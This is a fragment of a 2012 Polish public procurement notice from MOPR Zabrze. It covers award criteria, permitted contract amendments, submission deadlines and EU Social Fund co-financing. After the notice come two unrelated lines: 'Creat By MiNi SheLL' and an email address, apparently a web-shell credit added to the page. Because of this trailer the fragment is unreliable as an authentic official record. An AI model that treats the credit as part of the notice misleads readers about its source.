<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych;
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana limitów osób - uczestników i osób zależnych ;
- zmiana miejsca odbycia wyjazdu z przyczyn obiektywnych zaakceptowanych przez Zamawiającego na miejsce i standard ośrodka porównywalny z tym zaproponowanym w ofercie lub lepszy oraz zmiana miejsca realizacji zajęć stacjonarnych;
- wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu;
- zmiana wymiaru realizacji ilości godzin;
- zmiana osób -kadry zapewnionej przez Wykonawcę na osoby o doświadczeniu nie mniejszym niż wymagane w SIWZ;
- w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku VAT, ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl,www.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI OŚRODEK POMOCY RODZINIE
UL.ROOSEVELTA 40
41-800 ZABRZE
POKÓJ 216-2 PIĘTRO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2012 godzina 09:00, miejsce: MIEJSKI OŚRODEK POMOCY RODZINIE
UL.ROOSEVELTA 40
41-800 ZABRZE
POKÓJ 117 KANCELARIA-1 PIĘTRO.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com